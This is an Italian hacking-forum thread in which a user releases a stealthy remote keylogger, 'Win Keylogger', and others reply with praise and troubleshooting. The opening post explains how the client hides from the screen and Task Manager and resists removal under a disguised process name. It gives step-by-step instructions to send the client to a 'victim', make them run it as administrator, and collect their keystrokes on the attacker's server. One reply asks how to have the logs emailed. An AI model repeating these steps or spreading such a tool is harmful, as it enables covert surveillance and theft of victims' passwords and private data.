• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

InfernoHacker

Utente Master
Autore del topic
18 Agosto 2007
2.775
0
Miglior risposta
0
Salve a tutti,oggi sono qui per presentarvi il mio ultimo programma.
So che molti di voi necessitano di un keylogger remoto ( molti per scopi di distruttivi,pochissimi per scopi personali ),così ho pensato bene di creare un keylogger con una multi connessione.
Cosa vuol dire questo ? Semplicemente con lo stesso programma aperto una sola volta,sulla stessa porta,potrete ricevere più pressioni di tasti intercettati da diversi computer !

Oltre a questa idea,ho pensato bene ( ovviamente ) di aggiungere un sistema per settare le impostazioni del client,decidendo il nome del processo,il titolo del programma,ovviamente host e porta del server ( cioè voi ) e scelta per l'esecuzione automatica.

Questo Keylogger una volta avviato,potrà SI essere chiuso,ma NON potrà essere eliminato ( specialmente se in esecuzione automatica ),poichè diventerà invisibile ( facendo credere all'utente che si sia chiuso ),non solo la schermata diventerà invisibile,ma anche al Task Manager ( cercate di dare il nome di un processo che non faccia insospettire gli utenti ).

Il programma è semplice ed intuitivo,per domande chiedete pure qui.

Istruzioni :

Estraete i file in un'unica cartella.
Aprite Win Keylogger.exe e scegliete Change Settings
Settate le impostazioni come meglio credete e a seconda del vostro IP e della porta da voi scelta
Confermare premendo Save Settings
Aprire la cartella Client e verificare che all'interno vi siano 3 file,di cui 2 OCX e 1 EXE
Se vi sono tutti e 3 i file comprimere la cartella,inviarla alla vittima e fargli aprire il programma eseguibile dopo aver estratto i file.
Premere su Open Server ( win keylogger.exe ) e scegliere la porta settata in precedenza.
Scegliere se salvare i logs manualmente o meno ( consigliato manualmente )
Per salvare manualmente basterà premere la X per chiudere il programma,tutte le connessioni verranno perse ( i client resteranno comunque attivi in attesa di un'altra connessione ! ),a questo punto vi chiederà di scegliere il nome del file sul quale salvare.

Questi semplici passi servono a far funzionare il programma !

NB : Se uno usa vista è necessario eseguire il programma come Amministratore,riferitelo alla vittima.

NB : Non aprite il file Client.exe ne il file creato successivamente con Win Keylogger.exe

NB : Non rinominare,ne cancellare alcun file

Screen :

Menù Change Settings :

Perfavore, Entra oppure Registrati per vedere i Link!

Uploaded with

Form del Server dove riceverete i dati :

Uploaded with

Download Rapidshare :

Download Megaupload :

Scansione Virustotal :

Risultato: 7/41 (17.08%)

Vi ricordo che è un Keylogger ed è abbastanza normale,comunque nessuno vi obbliga a scaricarlo.

Alla prossima release,By HaCk-GaMe

NB : Per quelli che hanno Windows Vista,i controlli OCX si trovano nella cartella Client,non è necessario scaricarli,basterà COPIARLI ( non spostarli ) nella directory principale di Win Keylogger.exe

VIDEO :

Ultima modifica:
  • Like
Reactions: 1 person
ottimo ;)

altro che keylogger di condorhacker, vero infè ? :asf:

Non so di cosa parli,non l'ho mai provato e,sinceramente preferisco non provarlo.
Non perchè l'ha fatto lui,proprio perchè per principio preferisco usare cose mie diciamo,mi dà anche maggiore soddisfazione.
Comunque grazie dei complimenti :emoji_slight_smile:

Non so di cosa parli,non l'ho mai provato e,sinceramente preferisco non provarlo.
Non perchè l'ha fatto lui,proprio perchè per principio preferisco usare cose mie diciamo,mi dà anche maggiore soddisfazione.
Comunque grazie dei complimenti :emoji_slight_smile:

Non ricordi nulla della chiacchierata di ieri sera ? o.o
vabbè vabbè..

Sembrerebbe buono, ma non cullarti e sotto con la creazione della v2 :punizione:

ottimo, comunque modifica

e aggiungi che per chi a windows vista e gli da problemi del file xpcontrols.ocx mancante (come a me ad esempio)

devono scaricarlo da qui:

EDIT: quando clicco open server dà un'altro file mancante xD

ecco il download del file mancante:

Ultima modifica:
Wa che hackerone questo inferno!1!1!1!!111!!one!1!11!oneone!!!!1111

Agisce sui byte!!!!!!!!!1!!!!!1111!!!!1!!!111!!!1!!11!!!!!!!!11

Ah mi sono dimenticato di dire che è nella cartella Client e il metodo per registrare gli OCX l'ho messo solo nel client per non far insospettire l'utente ( eh mi sono dimenticato >.< )

PS : Firefox non occorreva questa presa per il c**o ;)

Ultima modifica:
Carino però meglio non far alimentare l'uso di keylogger da parte degli utenti :emoji_relieved:

Sposta il componente dalla cartella Client alla cartella principale del programma ed esegui come amministratore ;)

Ok grazie ce lo fatta...e per poi farla ad inviare alla mia email?o hotmail.it di msn

Ottimo come KeyLogger, funzxiona alla perfezione, bravo. ;)

Ps : Hai dato un po' di pane ai Lamer...Ma comunque, la grafica è abbastanza buona :emoji_slight_smile: